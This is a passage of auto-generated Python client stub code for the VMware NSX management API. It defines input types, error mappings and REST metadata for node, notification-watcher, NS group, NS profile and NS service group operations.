http_method='PUT',
url_template='/api/v1/node',
request_body_parameter='node_properties',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NodeProperties'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'restart': {
'input_type': restart_input_type,
'output_type': type.VoidType(),
'errors': restart_error_dict,
'input_value_validator_list': restart_input_value_validator_list,
'output_validator_list': restart_output_validator_list,
'task_type': TaskType.NONE,
},
'setsystemtime': {
'input_type': setsystemtime_input_type,
'output_type': type.VoidType(),
'errors': setsystemtime_error_dict,
'input_value_validator_list': setsystemtime_input_value_validator_list,
'output_validator_list': setsystemtime_output_validator_list,
'task_type': TaskType.NONE,
},
'shutdown': {
'input_type': shutdown_input_type,
'output_type': type.VoidType(),
'errors': shutdown_error_dict,
'input_value_validator_list': shutdown_input_value_validator_list,
'output_validator_list': shutdown_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NodeProperties'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'restart': restart_rest_metadata,
'setsystemtime': setsystemtime_rest_metadata,
'shutdown': shutdown_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.node',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NormalizationsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {
'preferred_normalization_type': type.StringType(),
'resource_id': type.StringType(),
'resource_type': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/normalizations',
path_variables={
},
query_parameters={
'preferred_normalization_type': 'preferred_normalization_type',
'resource_id': 'resource_id',
'resource_type': 'resource_type',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NormalizedResourceListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.normalizations',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NotificationWatchersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'notification_watcher': type.ReferenceType('com.vmware.nsx.model_client', 'NotificationWatcher'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/notification-watchers',
request_body_parameter='notification_watcher',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'watcher_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/notification-watchers/{watcher-id}',
path_variables={
'watcher_id': 'watcher-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'watcher_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/notification-watchers/{watcher-id}',
path_variables={
'watcher_id': 'watcher-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/notification-watchers',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'watcher_id': type.StringType(),
'notification_watcher': type.ReferenceType('com.vmware.nsx.model_client', 'NotificationWatcher'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/notification-watchers/{watcher-id}',
request_body_parameter='notification_watcher',
path_variables={
'watcher_id': 'watcher-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NotificationWatcher'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NotificationWatcher'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NotificationWatcherListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NotificationWatcher'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.notification_watchers',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NsGroupsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for addorremoveexpression operation
addorremoveexpression_input_type = type.StructType('operation-input', {
'ns_group_id': type.StringType(),
'ns_group_expression_list': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroupExpressionList'),
'action': type.StringType(),
})
addorremoveexpression_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
addorremoveexpression_input_value_validator_list = [
HasFieldsOfValidator()
]
addorremoveexpression_output_validator_list = [
HasFieldsOfValidator()
]
addorremoveexpression_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ns-groups/{ns-group-id}',
request_body_parameter='ns_group_expression_list',
path_variables={
'ns_group_id': 'ns-group-id',
},
query_parameters={
'action': 'action',
},
content_type='application/json'
)
# properties for create operation
create_input_type = type.StructType('operation-input', {
'ns_group': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroup'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ns-groups',
request_body_parameter='ns_group',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'ns_group_id': type.StringType(),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ns-groups/{ns-group-id}',
path_variables={
'ns_group_id': 'ns-group-id',
},
query_parameters={
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ns_group_id': type.StringType(),
'populate_references': type.OptionalType(type.BooleanType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-groups/{ns-group-id}',
path_variables={
'ns_group_id': 'ns-group-id',
},
query_parameters={
'populate_references': 'populate_references',
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'member_types': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'populate_references': type.OptionalType(type.BooleanType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-groups',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'member_types': 'member_types',
'page_size': 'page_size',
'populate_references': 'populate_references',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'ns_group_id': type.StringType(),
'ns_group': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroup'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ns-groups/{ns-group-id}',
request_body_parameter='ns_group',
path_variables={
'ns_group_id': 'ns-group-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'addorremoveexpression': {
'input_type': addorremoveexpression_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroup'),
'errors': addorremoveexpression_error_dict,
'input_value_validator_list': addorremoveexpression_input_value_validator_list,
'output_validator_list': addorremoveexpression_output_validator_list,
'task_type': TaskType.NONE,
},
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroup'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroup'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroupListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSGroup'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'addorremoveexpression': addorremoveexpression_rest_metadata,
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ns_groups',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NsProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'ns_profile': type.ReferenceType('com.vmware.nsx.model_client', 'NSProfile'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ns-profiles',
request_body_parameter='ns_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'ns_profile_id': type.StringType(),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ns-profiles/{ns-profile-id}',
path_variables={
'ns_profile_id': 'ns-profile-id',
},
query_parameters={
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ns_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-profiles/{ns-profile-id}',
path_variables={
'ns_profile_id': 'ns-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'attribute_type': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-profiles',
path_variables={
},
query_parameters={
'attribute_type': 'attribute_type',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'ns_profile_id': type.StringType(),
'ns_profile': type.ReferenceType('com.vmware.nsx.model_client', 'NSProfile'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ns-profiles/{ns-profile-id}',
request_body_parameter='ns_profile',
path_variables={
'ns_profile_id': 'ns-profile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSProfile'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSProfile'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSProfileListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NSProfile'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ns_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NsServiceGroupsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'ns_service_group': type.ReferenceType('com.vmware.nsx.model_client', 'NSServiceGroup'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ns-service-groups',
request_body_parameter='ns_service_group',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'ns_service_group_id': type.StringType(),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.concurrent_change':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ns-service-groups/{ns-service-group-id}',
path_variables={
'ns_service_group_id': 'ns-service-group-id',
},
query_parameters={
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'ns_service_group_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ns-service-groups/{ns-service-group-id}',
path_variables={
'ns_service_group_id': 'ns-service-group-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'default_service': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
